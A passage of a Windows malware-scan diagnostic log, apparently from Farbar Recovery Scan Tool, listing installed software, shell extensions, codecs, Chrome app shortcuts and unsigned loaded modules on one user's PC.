Uplay (HKLM-x32\...\Uplay) (Version: 98.0 - Ubisoft)
vcpp_crt.redist.clickonce (HKLM-x32\...\{16E08161-F78C-4FFC-8E12-F9BEA280795F}) (Version: 14.16.27012 - Microsoft Corporation) Hidden
Visual Studio Community 2017 (HKLM-x32\...\aa5cdd5f) (Version: 15.9.28307.222 - Microsoft Corporation)
Visuino version 7.8.3.69 (HKLM-x32\...\Visuino_is1) (Version: - Mitov Software LLC)
VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{40040E64-50EB-4FCF-B209-DA0B20821759}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{6DFE6F8D-B61D-4348-AB70-4ABF1210DFD5}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.24-2 - Wacom Technology Corp.)
Warface My.Com (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Warface My.Com) (Version: 1.131 - MY.GAMES)
Wasteland 3 (HKLM-x32\...\Wasteland 3_is1) (Version: - )
WinAppDeploy (HKLM-x32\...\{9690D51C-4435-1C20-7819-66CCAB0F03F9}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Windows SDK AddOn (HKLM-x32\...\{350F0ECD-0783-4529-8797-98F0AD33EAC0}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.16299.15 (HKLM-x32\...\{6195c203-b53c-4bb7-983a-6070a902e704}) (Version: 10.1.16299.15 - Microsoft Corporation)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{385A1387-A488-9E90-3635-086129610034}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{D7DD3171-DA58-52A1-95B2-4769640855AF}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{7336279F-8F8F-5530-A543-3BE963846C0A}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E414A474-0A87-4F66-C409-A4D9857CFD34}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{CE760B86-975B-F514-5673-0ED4332B801B}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{5E67F8BE-D8D2-257F-CE19-419A2D5125C7}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{A2AA063E-AF50-A1F5-8925-A06EB1556644}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{7D4C7F4A-02A9-E434-6451-C8787DF28C1F}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{BC467065-9374-5345-DA3F-FCF073304A25}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Wolfram Extras 11.0 (5597552) (HKLM\...\A-WIN-Extras 11.0.1 5597552_is1) (Version: 11.0.1 - Wolfram Research, Inc.)
Wolfram Mathematica 11 (M-WIN-L 11.0.1 5597744) (HKLM\...\M-WIN-L 11.0.1 5597744_is1) (Version: 11.0.1 - Wolfram Research, Inc.)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{2AD206F1-152C-4F9D-A24E-6F93FE7A4AFC}\InprocServer32 -> C:\Users\Tomika\AppData\Local\Grammarly\Grammarly for Microsoft Office Suite\6.7.217\DA89310249\GrammarlyShim64.dll (Grammarly, Inc. -> CompanyName)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{35B08E96-DA1F-4321-BF80-D6B53C20F3CF}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\SyncedOverlay.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{4585263E-BEF5-4A39-A2E8-8F69E0054F0C}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\ActiveOverlay.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{4BE56754-B616-4998-B825-D16983AEE1B2}\InprocServer32 -> C:\Users\Tomika\AppData\Local\Grammarly\Grammarly for Microsoft Office Suite\6.7.217\DA89310249\Grammarly.AddIn.Connect.ActiveX.dll (Grammarly, Inc. -> Grammarly)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel(R) pGFX -> Intel Corporation)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{C4F0910E-E0B4-4E68-8086-452730C7A26A}\InprocServer32 -> C:\Users\Tomika\AppData\Local\Autodesk\webdeploy\production\013be2658e0f76cf3bfa01262889994ea1c15a54\NPreview10.dll (Autodesk, Inc. -> )
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{E07BCA71-E88B-4A5E-BA46-69A52D6B9B20}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\LockedOverlay.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems Incorporated -> Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ 0drive.Active] -> {4585263E-BEF5-4A39-A2E8-8F69E0054F0C} => C:\Users\Tomika\.odrive\bin\6729\x64\ActiveOverlay.dll [2020-10-03] () [File not signed]
ShellIconOverlayIdentifiers: [ 0drive.Locked] -> {E07BCA71-E88B-4A5E-BA46-69A52D6B9B20} => C:\Users\Tomika\.odrive\bin\6729\x64\LockedOverlay.dll [2020-10-03] () [File not signed]
ShellIconOverlayIdentifiers: [ 0drive.Synced] -> {35B08E96-DA1F-4321-BF80-D6B53C20F3CF} => C:\Users\Tomika\.odrive\bin\6729\x64\SyncedOverlay.dll [2020-10-03] () [File not signed]
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync64.dll [2020-09-09] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync64.dll [2020-09-09] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync64.dll [2020-09-09] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers1: [ 0drive] -> {679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C} => C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll [2020-10-03] () [File not signed]
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Programy\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => D:\Programy\Adobe\Acrobat\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2016-05-18] (Notepad++ -> )
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2020-09-09] (Google LLC -> Google)
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Programy\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2020-09-09] (Google LLC -> Google)
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers5: [ 0drive] -> {679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C} => C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll [2020-10-03] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2020-01-01] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2019-11-21] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [ 0drive] -> {679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C} => C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll [2020-10-03] () [File not signed]
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Programy\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => D:\Programy\Adobe\Acrobat\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [vidc.xvid] => C:\Windows\SysWOW64\xvidvfw.dll [235520 2017-12-08] () [File not signed]
HKLM\...\Drivers32: [vidc.x264] => C:\Windows\SysWOW64\x264vfw.dll [3850240 2017-07-30] (x264vfw project) [File not signed]
HKLM\...\Drivers32: [vidc.lags] => C:\Windows\SysWOW64\lagarith.dll [230080 2016-09-21] (Cole Williams Software Limited -> )
HKLM\...\Drivers32: [msacm.divxa32] => C:\Windows\SysWOW64\DivXa32.acm [291408 2013-12-17] (Packed With Joy !) [File not signed]
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Any.do.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=ocgddccilgpeepgglnlpchkpgamkgmld
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Google Keep – poznámky a seznamy.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=hmjkmjkepdijhoojdojkdfohbdgmmhki
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Vysor.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=gidgenkbbabolejbgbpnhbimgjbffefm
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\bf33aa3a868e27f5\Any.do Extension.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=kdadialhpiikehpdeejjeiikopddkjem
==================== Loaded Modules (Whitelisted) =============
2020-03-19 12:35 - 2017-04-17 10:43 - 003852800 ____N () [File not signed] C:\Program Files (x86)\Bloody7\Bloody7\Data\Mouse\Forms\Internet_Advertisement\Internet_Advertisement_DLL.dll
2020-10-05 22:07 - 2020-04-20 15:20 - 000092672 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_ctypes.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000142336 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_elementtree.pyd
2020-10-05 22:07 - 2020-04-20 15:22 - 001101824 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_hashlib.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000027648 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_multiprocessing.pyd
2020-10-05 22:07 - 2020-04-20 15:21 - 000046592 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_socket.pyd
2020-10-05 22:07 - 2020-04-20 15:21 - 000050688 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_sqlite3.pyd
2020-10-05 22:07 - 2020-04-20 15:21 - 001422336 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_ssl.pyd
2020-10-05 22:07 - 2015-06-11 05:34 - 000729088 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\apsw.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000071168 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\bz2.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000029184 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._AES.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000008704 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._ARC4.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000019968 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._Blowfish.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000054784 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._DES3.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000009728 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Random.OSRNG.winrandom.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000010240 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Util._counter.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000007680 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Util.strxor.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000039936 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\psutil._psutil_windows.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000142336 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\pyexpat.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000008704 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.Qt.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 001721856 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtCore.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 001804288 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtGui.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000503808 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtNetwork.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000099840 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtOpenGL.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000193024 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtPrintSupport.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000320512 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtQml.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000416768 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtQuick.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000180224 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSensors.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000057344 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSerialPort.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000243200 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSql.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000086528 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtSvg.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000065024 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtTest.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000117760 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtWebKit.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 000215040 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtWebKitWidgets.pyd
2020-10-05 22:07 - 2015-06-10 10:16 - 003975168 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\PyQt5.QtWidgets.pyd
2020-10-05 22:07 - 2016-01-11 22:46 - 000396800 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\pythoncom27.dll
2020-10-05 22:07 - 2016-01-11 22:44 - 000110080 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\pywintypes27.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000032256 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qdds.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000021504 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qgif.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000027648 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qicns.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000020992 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qico.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000381952 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qjp2.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000204800 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qjpeg.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000218112 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qmng.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000015872 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qsvg.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000015360 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qtga.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000307712 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qtiff.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000014848 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qwbmp.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000252928 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\imageformats\qwebp.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000877056 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\qt5_plugins\platforms\qwindows.dll
2020-10-05 22:07 - 2020-04-20 15:20 - 000010240 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\select.pyd
2020-10-05 22:07 - 2020-10-03 04:52 - 000078848 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\sip.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000634368 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\sqlite3.dll
2020-10-05 22:07 - 2020-04-20 15:20 - 000687104 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\unicodedata.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000099328 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32api.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000024576 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32cred.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000017408 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32event.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000118784 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32file.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000035840 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32process.pyd
2020-10-05 22:07 - 2020-10-03 04:38 - 000107520 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\win32security.pyd
2020-10-05 22:07 - 2016-06-27 17:25 - 000121344 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\_ctypes.pyd
2020-10-05 22:07 - 2016-06-27 17:26 - 000051712 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\_socket.pyd
2020-10-05 22:07 - 2020-10-03 04:52 - 000712578 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\ActiveOverlay.dll
2020-10-05 22:07 - 2020-10-03 04:52 - 000714980 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll
2020-10-05 22:07 - 2020-10-03 04:52 - 000712586 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\LockedOverlay.dll
2020-10-05 22:07 - 2016-01-11 22:54 - 000548864 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\pythoncom27.dll
2020-10-05 22:07 - 2016-01-11 22:52 - 000137728 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\pywintypes27.dll
2020-10-05 22:07 - 2020-10-03 04:52 - 000712582 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\SyncedOverlay.dll
2020-10-05 22:07 - 2016-06-27 17:25 - 000693248 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\unicodedata.pyd
2020-10-05 22:07 - 2016-01-11 22:53 - 000130560 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32api.pyd
2020-10-05 22:07 - 2016-01-11 22:57 - 000522240 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32com.shell.shell.pyd
2020-10-05 22:07 - 2016-01-11 22:53 - 000223744 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32gui.pyd
2020-10-05 22:07 - 2016-01-11 22:53 - 000017920 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\x64\win32trace.pyd
2019-11-02 12:44 - 2019-11-02 12:44 - 098275328 _____ () [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libcef.dll
2019-11-02 12:44 - 2019-11-02 12:44 - 000092672 _____ () [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libEGL.dll
2019-11-02 12:44 - 2019-11-02 12:44 - 003922432 _____ () [File not signed] D:\Programy\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libGLESv2.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 004110848 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Core.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 004346368 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Gui.dll
2020-10-05 22:07 - 2015-06-10 10:16 - 000544768 _____ (Digia Plc and/or its subsidiary(-ies)) [File not signed] C:\Users\Tomika\.odrive\bin\6729\Qt5Multimedia.dll
